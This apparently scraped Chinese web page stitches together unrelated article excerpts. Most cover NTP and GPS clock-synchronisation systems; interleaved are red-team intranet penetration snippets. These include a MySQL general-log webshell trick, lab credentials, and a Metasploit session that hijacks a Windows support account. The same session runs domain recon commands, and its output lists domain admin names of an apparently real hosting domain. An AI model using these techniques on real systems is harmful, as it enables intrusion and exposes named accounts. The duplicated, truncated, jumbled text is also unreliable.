随着城市经济社会发展以及人口和机动车快速增长,建设新城市交通体系,改善城市公共交通运输结构,推进“公交城市”成为某城市公交建设的重点。某公交集团智能图像信息调度指挥系统的应用实现了公交智能化、可视化的调度指挥。本文是该系统的详细介绍,与读者共享。
当获取了一台在域内的Windows服务器权限,就需要我们尽可能地去收集所能获取到的域的相关信息,收集的域的信息越多,拿下域控的成功率越高。
随着城市经济社会发展以及人口和机动车快速增长,建设新城市交通体系,改善城市公共交通运输结构,推进“公交城市”成为某市公交建设的重点。某市公交集团智能图像信息调度指挥系统的应用实现了公交智能化、可视化的调度指挥。本文是该系统的详细介绍,与读者共享。
首先介绍此次渗透的环境:假设我们现在已经渗透了一台服务器PAVMSEF21,该服务器内网IP为10.51.0.21。扫描后发现内网网络结构大概如图所示,其中PAVMSEF21是连接外网和内网的关键节点,内网其他服务器均不能直接连接。
渗透测试的本质是信息收集,我们可以将内网信息收集大致分为5个步骤,即本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。
Windows配置域控参考我写的 https://cloud.tencent.com/developer/article/1925795 ,实际就4句命令而已,很简单。
大家好,这里是 渗透攻击红队 的第 72 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!
外网更侧重于找漏洞寻找突破口 举个简单的例子: 把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门,进入超市。
现在市场上主流的时钟服务器价格一般从几百到几千,甚至有的高达十几万元,大多数客户都不清楚其中的缘由,只是觉得同样的校时功能,价格怎么差别这么大,其实功能是不一样的,具体的价格要根据时间服务器能够接收的外部参考源,内部时钟源,输出授时信号种类,授时信号路数,授时精度等因素决定。
VM1双网卡,第一个桥接一个VMnet2,桥接的作用是模拟将其web服务暴露在外网。攻击机是在桥接网卡的网络中。
当开启general log为on时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。所以为了get shell,我们将general log设为on,将general log file设为C:/phpStudy/WWW/test.php
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
NTP(Network Time Protocol) 网络时间协议,工作在UDP的123端口上。是用来使计算机时间同步化的一种协议,它可以使计算机对其服务器或时钟源(如石英钟,GPS等等)做同步化,它可以提供高精准度的时间校正(局域网上与标准间差小于1毫秒,互联网上几十毫秒),且可介由加密确认的方式来防止恶毒的协议攻击。
在当代科技的快速发展下,各行各业对于时间精度的要求也越来越高,普通的时钟设备已经无法满足各行各业的需求,比如银行金融系统的时钟设备,则需要时钟能够以卫星时间为基准,还需要时钟设置能够统一银行局域网内所有设备的时间,还要时钟设备具有守时功能和防火墙功能。所以对于银行金融系统来说,更需要一套时钟同步系统来保证银行内的时间系统。本文章主要讲述银行金融系统时钟同步系统的方案。
下文仅限于域内的信息收集,均不会涉及域内认证原理等概念,后面会对windows认证方式单独写一篇总结。
在渗透测试过程中,我们少不了用到后渗透技术,就是说内网渗透(域渗透)。我们今天就来简单学习一下基本的内网渗透(域渗透)技术,信息收集篇。
最近在学习内网渗透,很想找个机会练练手。正好团队接到红队评估的项目,于是便有了此文,没什么技术含量,师傅们轻点喷。
当渗透测试进入内网后,面对复杂的内网域环境,首先需要了解当前所处的网络环境,例如判断当前机器的的角色,当前机器所处位置区域,以及当前网络环境的拓扑结构等。因此,我们需要对当前内网环境进行信息搜集。
我们有两台CentOS服务器,其中一台是可以连接外网的,下文中我们称它为A服务器,另一台不能连接外网,但是与A服务器在同一局域网中,下文中我们称它为服务器B。
工作组是局域网中的一个概念,它是最常见的资源管理模式,简单是因为默认情况下计算机都是采用工作组方式进行资源管理的。将不同的电脑按功能分别列入不同的组中,以方便管理。默认情况下所有计算机都处在名为 WORKGROUP 的工作组中,工作组资源管理模式适合于网络中计算机不多,对管理要求不严格的情况。 域(domain)是微软为集中管理计算机而推出的一种方式,用来描述一种架构,和“工作组”相对应,由工作组升级而来的高级架构,域 (Domain)是一个有安全边界的计算机集合( 安全边界,意思是在两个域中,一个域中的用户无法访问另一个域中的资源)。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。
Administrator/Admin@123、vulntarget.com\win2016/Admin#123
要做到服务器集群的时间同步,集群中各台机器的时区必须相同的,我们在国内就使用中国时区,如果你的机器的时区不是"Asia/Shanghai",需要修改时区
时钟同步工具我用到过两个:ntp和chrony。chrony同步时间是断断续续的环境中有效地执行。 而ntp需要定期对引用进行轮询才能正常工作。
msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_account msf post(enable_support_account) > set password 7a57a5a743894a0e msf post(enable_support_account) > set session 2 msf post(enable_support_account) > exploit [*] Target OS is Windows .NET Server (Build 3790, Service Pack 2). [*] Harvesting users... [+] Found SUPPORT_388945a0 account! [*] Target RID is 1004 [*] Account is disabled, activating... [*] Swapping RIDs...! [*] Setting password to 7a57a5a743894a0e [*] Post module execution completed 用于远程桌面连接的3389端口被管理员修改过了,根据经验猜测3392应该是修改后的端口号,在远程连接界面看到存在域,说明这台机器在HOSTING域内。 Webshell执行域信息搜集相关命令时会提示:System error 5 has occurred . Access is denied . 。访问被拒绝,权限问题。 ipconfig /all //网卡配置信息,所属域以及IP段 ping backbox //显示该机器名的IP net view //显示当前域中的计算机列表 net view /domain //查看有多少个域 net user /domain //获取所有域用户列表 net group /domain //获取域用户组信息 net group "domain admins" /domain //获取当前域管理员 net time /domain //域服务器一般也做时间服务器 dsquery server //查看域控服务器 dsquery subnet //查看域IP地址范围 因为meterpreter会话2里已经是SYSTEM权限了,所以可以用shell命令进入DOS命令行下执行以下命令搜集域信息,缺图。 msf post(enable_support_account) > sessions -i 2 [*] Starting interaction with 2... meterpreter > shell Process 13204 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain hosting.lunarpages.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- _new_win_user abbas.khan akumar alexb alext brianl dgreathouse dimitriosk epak gcager gudiyak iismon Jassi
某机场是某省的重要航空交通枢纽,是一个现代化的大型机场。机场内有电子钟94个,同时建设有离港系统、航显系统、广播系统、指挥调度系统、安检信息系统、楼宇自控系统、安防监控系统、停车场管理系统、呼叫中心系统等多个信息系统,这些系统通过接口互相连接协同工作,时间的一致性非常重要。通过建设时钟同步系统,将各系统的时钟进行统一校准,为各系统协同工作打下坚实基础。
本文章是关于内网方面渗透技巧的一个文章,用的环境是VulnStack1,VulnStack是红日安全团队出的一个内网渗透的靶机环境,感谢红日团队
各个化工厂的的终端设备时间不统一,是由于前端的计算机控制系统和中控操作系统运行过程中出现时钟不同步的问题,特别是生产过程中发生事故时,分析事故过程中对第一事故的时间要求下尤其重要,这时就显得时间同步系统尤为重要。
通常情况下,Windows 2000/xp/2003域成员有个w32time时间服务,它会自动与域DC进行时间同步,无需人为干涉,保持域内时间的同步是kerberos认证协议的一个基本要求,也是为了防止重放攻击的一种手段,如果域成员客户机与DC的时间相差太大的话,它的登录将不能成功,这时你可以手动调整系统时间,通常情况下,只要通讯无阻碍,域成员将自动与DC保持时间同步 还可以在命令行下实现: net time /setsntp:time.×××.cn (设置时间服务器地址) net stop w32t
在上一节《记一次Vulnstack靶场内网渗透(二)》中,我们简单的对vulnstack 4的靶场环境做了一次测试,通过外网初探、信息收集、攻入内网最终拿下域控。在本节中,我们将对vulnstack 2这个靶场进行渗透测试。靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
GPS卫星定位系统它可以应用在军事、国防、通信、授时等多个领域。GPS卫星定位系统应用在授时方面,是将卫星信号传送给设备并进行授时。GPS网络时间服务器是接收GPS卫星信号的时间服务器,它可以将卫星时间信号转换为网络、串口、秒脉冲等时间信息,能为用户提供相应的时间信息。GPS网络时间服务器主要输出网络时间信号,能在多种环境中进行授时,并且授时准确使用方便,改变了传统的钟表授时方式。
本文主要以GPS网络时间服务器在市场推进下,产生的设备更新优化的影响,以及GPS网络事件服务器集成后的特性,有利于用户对现有工业使用的GPS网络时间服务器的认知,和与原有GPS网络时间服务器的差异性。
安防视频监控系统的时钟同步是指综合应用视音频监控、通信、计算机网络等技术监视设防区域,并实时显示、记录现场图像的电子系统或网络。 安防视频监控系统的时钟同步系统可以在非常事件突发时,及时地将叠加有时间、地点等信息内容的现场情况记录下来,以便重放时分析调查,并作为具有法律效力的重要证据,这样既提高了安保人员处警的准确性,也可为公安人员迅速破案提供有力证据。但视频监控系统经常出现显示时间不正确的问题,使系统提供的数字证据大打折扣,甚至不具备法律效力而无法使用,本文从多方面分析了产生 安防视频监控系统的时钟不同步问题的原因并给出有效的解决途径和方案。
GPS网络时间服务器是服务于工业应用的硬件设备,通过接收GPS卫星信号,来获取世界通用的标准时间信息,通过软硬件结合技术,进行专业的处理,解析为用于地区标准时输出的时间信息码,以网络授方式,完成对相应网络客户端设备的时间同步作用。
本文主要讲GPS网络时间服务器在使用中的安装问题,以GPS网络时间服务器的使用为切入点,阐述了GPS网络时间服务器在使用中的注意事项和在对GPS网络时间服务器进行配置时的操作方法,方便用户对GPS网络时间服务器在项目现场正确的应用于整个系统中。
运维人员需要对系统和业务日志进行精准把控,便于分析系统和业务状态。日志分布在不同的服务器上,传统的使用传统的方法依次登录每台服务器查看日志,既繁琐又效率低下。所以我们需要**集中化的日志管理工具将位于不同服务器上的日志收集到一起, 然后进行分析,展示**。
NTP 是网络时间协议(Network Time Protocol)的简称,通过 udp 123 端口进行网络时钟同步
局域网内的设备均有自身的时间,各设备可以根据与钟面时间进行比对,人工调整从而实现网时间同步。此种方法不需要另外开发软件和硬件,使用现有设备即可完成。但时间同步精度低,误差可达几秒,导致各个设备之间的时间误差越来越大。
搭建私有云环境,为了确保数据中心内部服务器的时间一致,一般建议在数据中心内部搭建NTP服务。这里将搭建NTP服务器的过程简单记录一下以备忘。 NTP服务端设置 #安装ntp服务 yum install -y ntp echo " #在与上级时间服务器联系时所花费的时间,记录在driftfile参数后面的文件 driftfile /var/lib/ntp/drift #默认关闭所有的 NTP 联机服务 restrict default ignore restrict -6 default ignore #如
微软从Windows2000开始,系统就支持使用NTP同步的方式获取时间,Windows系统默认的时间源都来自time.windows.com。
由于每台服务器都需要注册用于Kerberos身份验证服务的SPN,因此这为在不进行大规模端口扫描的情况下收集有关内网域环境的信息提供了一个更加隐蔽的方法。
时钟系统为全医院提供提供统一的准确时间,其主要作用是为整个医院的工作人员提供准确的时间服务,同时也为计算机系统及呼叫系统、BA系统、手术室控制系统以及其它弱电子系统提供标准的时间源。各办公室内及其它通道内的时钟可以为工作人员提供准确的时间信息;向其它系统提供的时钟信息为整个残联大楼弱电运行提供了标准的时间,保证了整个残联大楼弱电运行的准时、安全。它的主要功能有:
网络时间协议(NTP )是一种通过因特网服务于计算机时钟的同步时间协议。它提供了一种同步时间机制,能在庞大而复杂多样的因特网中用光速调整时间分配。它使用的是可返回时间设计方案,其特点是:时间服务器是一种分布式子网,能自我组织操作、分层管理配置,经过有线或无线方式同步逻辑时钟达到国家标准时间。此外,通过本地路由选择运算法则及时间后台程序,服务器可以重新分配标准时间。
在医院内网系统中,使用时间源(时钟源)作为时间同步方案可以提供高精度和可靠的时间参考。以下是一个基本的方案框架,说明了如何将GPS北斗时间源集成到医院内网系统中。
支持NTPv1.v2.v3&v4、ARP、ICMP、HTTP、UDP、SNMP 协议
最重要的公共服务之一就是报时timekeeping,但是很多人并没有意识到这一点。大多数公共时间服务器都是由志愿者管理,以满足不断增长的需求。这里学习一下如何运行你自己的时间服务器,为基础公共利益做贡献。(查看 在 Linux 上使用 NTP 保持精确时间 去学习如何设置一台局域网时间服务器)
"鹅厂网事"由深圳市腾讯计算机系统有限公司技术工程事业群网络平台部运营,我们希望与业界各位志同道合的伙伴交流切磋最新的网络、服务器行业动态信息,同时分享腾讯在网络与服务器领域,规划、运营、研发、服务等层面的实战干货,期待与您的共同成长。 网络平台部以构建敏捷、弹性、低成本的业界领先海量互联网云计算服务平台,为支撑腾讯公司业务持续发展,为业务建立竞争优势、构建行业健康生态而持续贡献价值! 2015年7月1日07:59:60是一个奇妙的时刻… 这一刻,迎来了全球第26次闰秒。何为闰秒? 先介绍几个概念
准确的计时对于几乎所有服务或软件都至关重要。在分布式平台上运行的电子邮件,记录器,事件系统和调度程序,用户身份验证机制和服务都需要准确的时间戳来按时间顺序记录事件。这些服务使用网络时间协议(NTP)将系统时钟与可信外部源同步。该源可以是原子钟,GPS接收器或已经使用NTP的其他时间服务器。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
